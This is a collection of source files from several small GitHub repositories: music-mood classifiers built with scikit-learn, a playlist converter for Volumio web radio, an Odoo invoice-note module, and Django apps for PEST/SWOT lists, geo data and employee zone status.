plt.subplots(figsize=(18, 12))\nsns.set(rc={'axes.facecolor':'black', 'figure.facecolor':'black', 'axes.grid' : False, 'text.color': 'white',\n 'xtick.color': 'white', 'ytick.color': 'white', 'axes.labelcolor': 'white', 'axes.edgecolor': 'white'} )\nplt.xlabel('Models')\nplt.ylabel('Features')\nheatmap = sns.heatmap(feature_importances, cmap = 'YlGnBu', cbar=False, annot=True)\nheatmap.set_yticklabels(heatmap.get_yticklabels(), rotation=0)\nheatmap.set(xlabel='Estimators', ylabel='Features')\nplt.savefig('../explore/feature_imp_audio.png', dpi=300)\nplt.show()\n\n# other models\nsimple_models = {}\nsimple_models['SVM'] = SVC(kernel='linear')\nsimple_models['KNN'] = KNeighborsClassifier()\nsimple_models['NB'] = GaussianNB()\n\nfor name, model in simple_models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\nprint \"Elapsed time: \", time() - start\n\n\nprint \"Training on qual features only\"\n\nX_train, X_test, y_train, y_test = train_test_split(X_qual, y, test_size=0.3, random_state=1010)\n\n\nfor name, model in models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\n\nfeature_importances = pd.DataFrame()\n\nfor name, model in models.iteritems():\n df = pd.DataFrame(data = model.feature_importances_, index = X_test.columns, columns = [name]).transpose()\n feature_importances = feature_importances.append(df)\n\nfeature_importances = feature_importances.transpose()\nfeature_importances['average'] = (feature_importances['RFC'] + feature_importances['XGB'] + feature_importances['GBC'] + feature_importances['ABC']\n + feature_importances['ETC'])/5\n\nfeature_importances = feature_importances.sort_values('average', ascending = False).drop('average', axis=1)\n\n\nfig, axes = plt.subplots(figsize=(18,12))\nsns.set(rc={'axes.facecolor':'black', 'figure.facecolor':'black', 'axes.grid' : False, 'text.color': 'white',\n 'xtick.color': 'white', 'ytick.color': 'white', 'axes.labelcolor': 'white', 'axes.edgecolor': 'white'} )\nplt.xlabel('Models')\nplt.ylabel('Features')\nheatmap = sns.heatmap(feature_importances, cmap = 'YlGnBu', cbar=False, annot=True)\nheatmap.set_yticklabels(heatmap.get_yticklabels(), rotation=0)\nheatmap.set(xlabel='Estimators', ylabel='Features')\nplt.savefig('../explore/feature_imp_qual.png', dpi=300)\nplt.show()\n\n# other models\nsimple_models = {}\nsimple_models['SVM'] = SVC(kernel='linear')\nsimple_models['KNN'] = KNeighborsClassifier(algorithm='auto', leaf_size=30, metric='euclidean',\n metric_params=None, n_jobs=1, n_neighbors=37, p=2,\n weights='uniform')\nsimple_models['NB'] = GaussianNB()\n\nfor name, model in simple_models.iteritems():\n model.fit(X_train, y_train)\n print name\n print classification_report(y_test, model.predict(X_test))\n print \"Accuracy: \", accuracy_score(y_test, model.predict(X_test))\n print '\\n'\n\nprint \"Elapsed time: \", time() - start\n\n\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7129008173942566, "alphanum_fraction": 0.7270693778991699, "avg_line_length": 33.38461685180664, "blob_id": "6201a54bf17691921c252d4a6920d7caec1afc54", "content_id": "a340899fefecc27335b9e3e0b858f18ce116d1e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1341, "license_type": "no_license", "max_line_length": 111, "num_lines": 39, "path": "/src/gridsearch_rfc.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV, KFold, cross_val_score\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\n\nrfc_params = {\"n_estimators\":[300, 500, 700, 1000], \"max_depth\": [7, 12, 15], \"criterion\": ['gini', 'entropy']}\n\nrfc_grid = GridSearchCV(estimator=RandomForestClassifier(), param_grid=rfc_params, scoring=accuracy, cv=5)\nrfc_grid.fit(train[features], train['Mood'])\n\nprint \"RFC grid search: \"\nprint \"CV results\", rfc_grid.cv_results_\nprint \"Best RFC\", rfc_grid.best_estimator_\nprint \"Best CV score for RFC\", rfc_grid.best_score_\nprint \"Best RFC params:\", rfc_grid.best_params_\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.6945578455924988, "alphanum_fraction": 0.7115646004676819, "avg_line_length": 30.84782600402832, "blob_id": "68564b7ac50758ef0a1675e6d030003618c2b10e", "content_id": "228a2457b04afd5b49f67f95aa811976ea6c06a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "no_license", "max_line_length": 104, "num_lines": 46, "path": "/src/gridsearch_knn.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import DistanceMetric\nfrom get_train_test import train\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\n\n\nX = train[features]\ny = train['Mood']\n\naccuracy = make_scorer(accuracy_score)\n\nstart = time()\n\nknn_params = {\"n_neighbors\": [5, 7, 9, 12, 17, 19, 21, 23, 27, 29, 33, 37], \"p\" : [2, 3, 5],\n \"algorithm\":['auto'], 'metric': ['euclidean']}\n\n\nknn_grid = GridSearchCV(estimator=KNeighborsClassifier(), param_grid=knn_params, scoring=accuracy, cv=5)\nknn_grid.fit(X, y)\n\nprint \"Extra Trees grid search: \"\nprint \"CV results\", knn_grid.cv_results_\nprint \"Best Extra Trees\", knn_grid.best_estimator_\nprint \"Best CV score for Extra Trees\", knn_grid.best_score_\nprint \"Best Extra Trees params:\", knn_grid.best_params_\n\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n\n\n\n\n\n" }, { "alpha_fraction": 0.7118279337882996, "alphanum_fraction": 0.7118279337882996, "avg_line_length": 23.473684310913086, "blob_id": "f2924e9d82c0db60a2cb170c2aff6ea571ff9733", "content_id": "2a6b9f6c7f39288a07bcca8f32506545cffe019f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 48, "num_lines": 19, "path": "/src/get_train_test.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\nfrom ast import literal_eval\nfrom sklearn.preprocessing import StandardScaler\n\n\ntrain = pd.read_pickle('../data/train.pkl')\ntest = pd.read_pickle('../data/test.pkl')\n\n\nprint \"Train--------\"\nhappy_train = train['Mood'] == 'happy'\nprint happy_train.value_counts()\n\nprint \"Test----------\"\nhappy_test = test['Mood'] == 'happy'\nprint happy_test.value_counts()\n" } ]
23
PierPP/volumio-radio-stations
https://github.com/PierPP/volumio-radio-stations
88693c6ef60ee2c134c08cd50fac6ba5fe61b2c2
d216d2f9956ac7bbced4811961081f78a1cba55c
4a1648b8287f4203e5dcd9b982828fc90d7b2edc
refs/heads/master
2021-01-20T02:53:05.884503
2017-08-24T21:42:38
2017-08-24T21:42:38
101,339,309
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7349823117256165, "alphanum_fraction": 0.7349823117256165, "avg_line_length": 20.769229888916016, "blob_id": "6b8a6a1b164e94d2fb91b2f0d03ada83ca94a295", "content_id": "3d6bb03c73fe8e335e9702be54fa7ce7d0718929", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 283, "license_type": "permissive", "max_line_length": 90, "num_lines": 13, "path": "/README.md", "repo_name": "PierPP/volumio-radio-stations", "src_encoding": "UTF-8", "text": "# volumio-radio-stations\n\n## for the impatient\n\nJust copy *my-web-radio* to /data/favourites/\n\n## what's converte.py? \n\nTo convert .pls files to the json format used by Volumio\n\n## why that?\n\nBecouse Tim (Moodeaudio) did a fantastic work with those and I wanted them in volumio too!\n" }, { "alpha_fraction": 0.6188924908638, "alphanum_fraction": 0.6340934038162231, "avg_line_length": 26.84848403930664, "blob_id": "7539f37756054480c9698f86bd8c0a70c380cbb9", "content_id": "7e6c1232801b387f5b61fb72a2dce1c29919c358", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 921, "license_type": "permissive", "max_line_length": 103, "num_lines": 33, "path": "/converte.py", "repo_name": "PierPP/volumio-radio-stations", "src_encoding": "UTF-8", "text": "import ConfigParser\nimport os\n\nprint \"[\"\n\ndef PrintEntry(thisfile):\n String1 = \"\"\n Config = ConfigParser.ConfigParser()\n Config.read(thisfile)\n url=ConfigSectionMap(Config,\"playlist\")['file1']\n name=ConfigSectionMap(Config,\"playlist\")['title1']\n ## {\"service\":\"webradio\",\"name\":\"SomaFM: Groove Salad\",\"uri\":\"http://somafm.com/groovesalad256.pls\"},\n String1 = '{\"service\":\"webradio\",\"name\":\"%s\",\"uri\":\"%s\"},' % (name,url)\n return String1\n\ndef ConfigSectionMap(Config,section):\n dict1 = {}\n options = Config.options(section)\n for option in options:\n try:\n dict1[option] = Config.get(section, option)\n #if dict1[option] == -1:\n # DebugPrint(\"skip: %s\" % option)\n except:\n print(\"exception on %s!\" % option)\n dict1[option] = None\n return dict1\n\nfor filename in os.listdir('.'):\n if filename.endswith(\".pls\"):\n print PrintEntry(filename)\n\nprint \"]\"\n\n\n" } ]
2
wangsamas/Odoo-default-note-on-invoice
https://github.com/wangsamas/Odoo-default-note-on-invoice
ba35413e26ba3c170ab4e5d8a5e1d9dbc4ad192f
e0ca7210df79dd0521b3e4b196eabe3d4082ecb9
f115e5ef96cc6930b711bf6f796bbf630f43c279
refs/heads/master
2020-03-24T20:19:50.811830
2018-07-31T06:36:55
2018-07-31T06:36:55
142,972,039
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8239436745643616, "alphanum_fraction": 0.8239436745643616, "avg_line_length": 70, "blob_id": "8831322fe5cd5831004259ea13c886115ae44adf", "content_id": "9522d1e8585a5c6deef32777c7996b29ba6f2a97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 142, "license_type": "no_license", "max_line_length": 110, "num_lines": 2, "path": "/README.md", "repo_name": "wangsamas/Odoo-default-note-on-invoice", "src_encoding": "UTF-8", "text": "# Odoo-default-note-on-invoice\nThis module replace default sale term and condition on invoice with default invoice term and condition in Odoo\n" }, { "alpha_fraction": 0.5600961446762085, "alphanum_fraction": 0.5649038553237915, "avg_line_length": 18.85714340209961, "blob_id": "ea676a316be02c28c688bb78df58083f8a6f7daa", "content_id": "44beb2774d788208140d0f53156bcbf0c1c019cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 416, "license_type": "no_license", "max_line_length": 103, "num_lines": 21, "path": "/invoice_note/__manifest__.py", "repo_name": "wangsamas/Odoo-default-note-on-invoice", "src_encoding": "UTF-8", "text": "{\n 'name': \"invoice_note\",\n\n 'summary': \"\"\"Default note on invoice\"\"\",\n\n 'description': \"\"\"\n\tThis module replace default sale term and condition on invoice with default invoice term and condition\n \"\"\",\n\n 'author': \"Kusuma Ruslan\",\n 'website': \"http://www.wangsamas.com\",\n\n 'category': 'Sale',\n 'version': '0.1',\n\n 'depends': ['sale_management'],\n\n 'data': [\n 'views/views.xml',\n ],\n}" }, { "alpha_fraction": 0.6736488342285156, "alphanum_fraction": 0.6746832132339478, "avg_line_length": 54.97101593017578, "blob_id": "9e32fb9a92d80261ff7369d015627932798be52f", "content_id": "ddec205e826c8e3c3ca3ad358dff2f1a6619ff83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3867, "license_type": "no_license", "max_line_length": 167, "num_lines": 69, "path": "/invoice_note/models/models.py", "repo_name": "wangsamas/Odoo-default-note-on-invoice", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom ast import literal_eval\nfrom odoo import models, fields, api\n\nclass ResCompany(models.Model):\n _inherit = \"res.company\"\n\n inv_note = fields.Text(string='Default Terms and Conditions', translate=True)\n\t\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\t\n inv_note = fields.Text(related='company_id.inv_note', string=\"Terms & Conditions\")\n use_inv_note= fields.Boolean(\n string='Default Invoice Terms & Conditions')\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n ICPSudo = self.env['ir.config_parameter'].sudo()\n sale_pricelist_setting = ICPSudo.get_param('sale.sale_pricelist_setting')\n sale_portal_confirmation_options = ICPSudo.get_param('sale.sale_portal_confirmation_options', default='none')\n default_deposit_product_id = literal_eval(ICPSudo.get_param('sale.default_deposit_product_id', default='False'))\n if default_deposit_product_id and not self.env['product.product'].browse(default_deposit_product_id).exists():\n default_deposit_product_id = False\n res.update(\n auth_signup_uninvited='b2c' if ICPSudo.get_param('auth_signup.allow_uninvited', 'False').lower() == 'true' else 'b2b',\n use_sale_note=ICPSudo.get_param('sale.use_sale_note', default=False),\n use_inv_note=ICPSudo.get_param('sale.use_inv_note', default=False),\n auto_done_setting=ICPSudo.get_param('sale.auto_done_setting'),\n default_deposit_product_id=default_deposit_product_id,\n sale_show_tax=ICPSudo.get_param('sale.sale_show_tax', default='subtotal'),\n multi_sales_price=sale_pricelist_setting in ['percentage', 'formula'],\n multi_sales_price_method=sale_pricelist_setting in ['percentage', 'formula'] and sale_pricelist_setting or False,\n sale_pricelist_setting=sale_pricelist_setting,\n portal_confirmation=sale_portal_confirmation_options in ('pay', 'sign'),\n portal_confirmation_options=sale_portal_confirmation_options if sale_portal_confirmation_options in ('pay', 'sign') else False,\n )\n return res\n\t\n @api.multi\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n ICPSudo = self.env['ir.config_parameter'].sudo()\n ICPSudo.set_param('auth_signup.allow_uninvited', repr(self.auth_signup_uninvited == 'b2c'))\n ICPSudo.set_param(\"sale.use_sale_note\", self.use_sale_note)\n ICPSudo.set_param(\"sale.use_inv_note\", self.use_inv_note)\n ICPSudo.set_param(\"sale.auto_done_setting\", self.auto_done_setting)\n ICPSudo.set_param(\"sale.default_deposit_product_id\", self.default_deposit_product_id.id)\n ICPSudo.set_param('sale.sale_pricelist_setting', self.sale_pricelist_setting)\n ICPSudo.set_param('sale.sale_show_tax', self.sale_show_tax)\n ICPSudo.set_param('sale.sale_portal_confirmation_options', self.portal_confirmation_options if self.portal_confirmation_options in ('pay', 'sign') else 'none')\n\nclass AccountInvoice(models.Model):\n _inherit = 'account.invoice'\n\t\n def _default_comment(self):\n invoice_type = self.env.context.get('type', 'out_invoice')\n if invoice_type == 'out_invoice' and self.env['ir.config_parameter'].sudo().get_param('sale.use_inv_note'):\n return self.env.user.company_id.inv_note\n\n @api.onchange('partner_id', 'company_id')\n def _onchange_delivery_address(self):\n addr = self.partner_id.address_get(['delivery'])\n self.partner_shipping_id = addr and addr.get('delivery')\n if self.env.context.get('type', 'out_invoice') == 'out_invoice':\n company = self.company_id or self.env.user.company_id\n self.comment = company.with_context(lang=self.partner_id.lang).inv_note\n\n\t\t\t\n" } ]
3
haydane/django
https://github.com/haydane/django
e97c66fab1e23102bcf68abec7fae5fd87b94d29
b5db385a2c98065dd8eba87fde34d7d0c84133be
4d13ccd295b8e027d9d14655b01303132a022c40
refs/heads/main
2023-05-24T04:15:54.827447
2021-06-12T14:54:35
2021-06-12T14:54:35
374,910,441
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8229426145553589, "alphanum_fraction": 0.8229426145553589, "avg_line_length": 32.5, "blob_id": "a2d5fd45a404586c354f3f3a344f1706b27c0112", "content_id": "9672a0149af0f0157dadb13b707b7f6be314a235", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 401, "license_type": "no_license", "max_line_length": 98, "num_lines": 12, "path": "/PestAndSwot/admin.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Politic, Economic, Social, Technology, Strength, Weakness, Opportunity, Thread\n\n# Register your models here.\nadmin.site.register(Politic)\nadmin.site.register(Economic)\nadmin.site.register(Social)\nadmin.site.register(Technology)\nadmin.site.register(Strength)\nadmin.site.register(Weakness)\nadmin.site.register(Opportunity)\nadmin.site.register(Thread)" }, { "alpha_fraction": 0.6471586227416992, "alphanum_fraction": 0.6471586227416992, "avg_line_length": 37.064517974853516, "blob_id": "b59a76747662b5f96082460b137f68550e4b1bbd", "content_id": "76f08ee557e294ab25f4fada929dcd1ffd85c1c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1179, "license_type": "no_license", "max_line_length": 98, "num_lines": 31, "path": "/PestAndSwot/views.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Politic, Economic, Social, Technology, Strength, Weakness, Opportunity, Thread\n\n# Create your views here.\ndef index(request):\n # pest\n politic_list = Politic.objects.all()\n economic_list = Economic.objects.all()\n social_list = Social.objects.all()\n technology_list = Technology.objects.all()\n #swot\n strength_list = Strength.objects.all()\n weakness_list = Weakness.objects.all()\n opportunity_list = Opportunity.objects.all()\n thread_list = Thread.objects.all()\n \n context = {\n 'politic_list':politic_list,\n 'economic_list':economic_list,\n 'social_list':social_list,\n 'technology_list':technology_list,\n 'strength_list':strength_list,\n 'weakness_list':weakness_list,\n 'opportunity_list':opportunity_list,\n 'thread_list':thread_list,\n }\n return render(request,'pestandswot/index.html',context)\n\ndef hello(request):\n return HttpResponse('<marquee behavior=\"scroll\" direction=\"right\">Hello World!</marquee>')" }, { "alpha_fraction": 0.7241379022598267, "alphanum_fraction": 0.7356321811676025, "avg_line_length": 42.66666793823242, "blob_id": "5c8c5975590841166ce0361a269f680175d27aa5", "content_id": "409f563368d4dd929023e07944522bf646efcc18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "no_license", "max_line_length": 91, "num_lines": 6, "path": "/edc/models.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass EdcData(models.Model):\n edc_value = models.DecimalField((\"EDC Value\"), max_digits=10, decimal_places=2)\n pub_date = models.DateTimeField((\"Published Date\"), auto_now=False, auto_now_add=False)" }, { "alpha_fraction": 0.6836460828781128, "alphanum_fraction": 0.7050938606262207, "avg_line_length": 40.55555725097656, "blob_id": "a05784bf85f654057080269d806009283b1c9c6c", "content_id": "91d79c357af061bd6d511436844d29ae857b692f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 373, "license_type": "no_license", "max_line_length": 84, "num_lines": 9, "path": "/geo/models.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass GeoData(models.Model):\n device_name = models.TextField((\"Device Name\"), blank=True) \n latitude = models.DecimalField((\"Latitude\"), max_digits=20, decimal_places=15)\n longitude = models.DecimalField((\"Longitude\"), max_digits=20, decimal_places=15)\n def __str__(self):\n return self.device_name" }, { "alpha_fraction": 0.6750841736793518, "alphanum_fraction": 0.6851851940155029, "avg_line_length": 36.0625, "blob_id": "49168f0c35bedd051d24538054899966bf101051", "content_id": "76b4e686bac358efac98b6526d6bdf44f83f66ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 594, "license_type": "no_license", "max_line_length": 68, "num_lines": 16, "path": "/employee_status/models.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass ZoneCategory(models.Model):\n id = models.AutoField(primary_key=True, auto_created=True)\n name = models.CharField((\"Category Name\"),max_length=50)\n def __str__(self):\n return self.name\n\nclass EmpInfo(models.Model):\n id = models.AutoField(primary_key=True, auto_created=True)\n zone = models.ForeignKey(ZoneCategory, on_delete=models.CASCADE)\n emp_name = models.CharField((\"Full Name\"), max_length=50)\n emp_role = models.CharField((\"Role\"), max_length=50)\n def __str__(self):\n return self.emp_name\n\n" }, { "alpha_fraction": 0.5207824110984802, "alphanum_fraction": 0.5941320061683655, "avg_line_length": 21.72222137451172, "blob_id": "5b31138890996c293d5cc4c2036c644fce7f37ae", "content_id": "d518d7cd6aac716cfc27ca85905bd2aee01b2b1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 75, "num_lines": 18, "path": "/geo/migrations/0007_geodata_device_name.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-04-16 11:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('geo', '0006_auto_20210416_1030'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='geodata',\n name='device_name',\n field=models.TextField(blank=True, verbose_name='Device Name'),\n ),\n ]\n" }, { "alpha_fraction": 0.5325301289558411, "alphanum_fraction": 0.6048192977905273, "avg_line_length": 22.05555534362793, "blob_id": "ce2783c01378f520aa97934fd92e65d54f71f4e0", "content_id": "d76e3e3d4b416b4f703cbafed2eb51ba2c77953e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 415, "license_type": "no_license", "max_line_length": 71, "num_lines": 18, "path": "/PestAndSwot/migrations/0003_alter_politic_description.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-14 09:34\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PestAndSwot', '0002_auto_20210514_0839'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='politic',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n ]\n" }, { "alpha_fraction": 0.7468030452728271, "alphanum_fraction": 0.7468030452728271, "avg_line_length": 31.66666603088379, "blob_id": "f0cbe6856ec452aa037374d6a008e427b7ac29fd", "content_id": "3844e8bbd2928219e80ce2b38df2fa6e3f926ac5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 58, "num_lines": 12, "path": "/edc/views.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import EdcData\nfrom django.core import serializers\nimport json\n\n# Create your views here.\ndef index(request):\n edc_data_list = EdcData.objects.all()\n data_js = serializers.serialize('json', edc_data_list)\n context = {'edc_data_list': data_js}\n return render(request, 'edc/index.html', context)" }, { "alpha_fraction": 0.668749988079071, "alphanum_fraction": 0.668749988079071, "avg_line_length": 22, "blob_id": "2e0a0e5c5656b1b5b9a2abfcead659129ee713ba", "content_id": "d5b128b816e062f87391e072db8db96803668aa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 52, "num_lines": 7, "path": "/PestAndSwot/urls.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('pestandswot/', views.index, name='index'),\n path('', views.hello, name='hello')\n]" }, { "alpha_fraction": 0.8151260614395142, "alphanum_fraction": 0.8151260614395142, "avg_line_length": 23, "blob_id": "2dc15aaf357e9f635afe7dc6f2abdd1165c2cb8f", "content_id": "5ec5a4bddbcf9535d8c0c927d4e7d3a5a4edbc5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/geo/admin.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import GeoData\n\n# Register your models here.\nadmin.site.register(GeoData)" }, { "alpha_fraction": 0.5512650012969971, "alphanum_fraction": 0.5632489919662476, "avg_line_length": 30.29166603088379, "blob_id": "3d2852095fb1a5c80dc2d023a2f8199db6122899", "content_id": "607f6bebd180679fd5e4ebbb7fdc2399c35ee2fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1502, "license_type": "no_license", "max_line_length": 71, "num_lines": 48, "path": "/PestAndSwot/migrations/0004_auto_20210514_0935.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-14 09:35\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PestAndSwot', '0003_alter_politic_description'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='economic',\n name='economics',\n field=models.TextField(blank=True, verbose_name='e'),\n ),\n migrations.AlterField(\n model_name='opportunity',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='social',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='strength',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='technology',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='thread',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='weakness',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n ]\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 29.219999313354492, "blob_id": "b600aa18b2f133c14af4feb94650e75dc0add5ed", "content_id": "698f94626ac3a85a9ab28566914ecb1678f866bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1515, "license_type": "no_license", "max_line_length": 56, "num_lines": 50, "path": "/PestAndSwot/models.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass Politic(models.Model):\n politics = models.TextField('p')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.politics\n\nclass Economic(models.Model):\n economics = models.TextField('e')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.economics\n\nclass Social(models.Model):\n socials = models.TextField('s')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.socials\n \nclass Technology(models.Model):\n technologies = models.TextField('t')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.technologies \n\nclass Strength(models.Model):\n strengths = models.TextField('s')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.strengths\n \nclass Weakness(models.Model):\n weaknesses = models.TextField('w')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.weaknesses\n \nclass Opportunity(models.Model):\n opportunities = models.TextField('o')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.opportunities\n \nclass Thread(models.Model):\n threads = models.TextField('t')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.threads\n " }, { "alpha_fraction": 0.5976591110229492, "alphanum_fraction": 0.6020482778549194, "avg_line_length": 35, "blob_id": "afc9d9a7dbf67f5117839cfff6ef7573f033b96c", "content_id": "1ffb8602f95fff3a62b15bfe4a6c44a4fab11346", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1367, "license_type": "no_license", "max_line_length": 59, "num_lines": 38, "path": "/employee_status/views.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom .models import EmpInfo, ZoneCategory\n\n# Create your views here.\ndef index(request):\n yellow = EmpInfo.objects.filter(zone_id=1).count()\n dark_yellow = EmpInfo.objects.filter(zone_id=2).count()\n red = EmpInfo.objects.filter(zone_id=3).count()\n zone_list = ZoneCategory.objects.all()\n empInfo_list = EmpInfo.objects.all()\n\n context = { \"zone_list\": zone_list, \n \"empInfo_list\": empInfo_list,\n \"yellow\": yellow, \n \"dark_yellow\": dark_yellow, \n \"red\": red, \n }\n return render(request,'employees/index.html', context)\n\ndef updateZoneStatus(request):\n yellow = EmpInfo.objects.filter(zone_id=1).count()\n dark_yellow = EmpInfo.objects.filter(zone_id=2).count()\n red = EmpInfo.objects.filter(zone_id=3).count()\n zone_list = ZoneCategory.objects.all()\n empInfo_list = EmpInfo.objects.all()\n\n context = { \"zone_list\": zone_list, \n \"empInfo_list\": empInfo_list,\n \"yellow\": yellow, \n \"dark_yellow\": dark_yellow, \n \"red\": red, \n }\n\n zone_id = request.GET['zone_id']\n emp_id = request.GET['emp_id']\n EmpInfo.objects.filter(fk=zone_id).update(zone=zone_id)\n print(zone_id)\n return render(request,'employees/index.html',context)" }, { "alpha_fraction": 0.5320945978164673, "alphanum_fraction": 0.5439189076423645, "avg_line_length": 33.82352828979492, 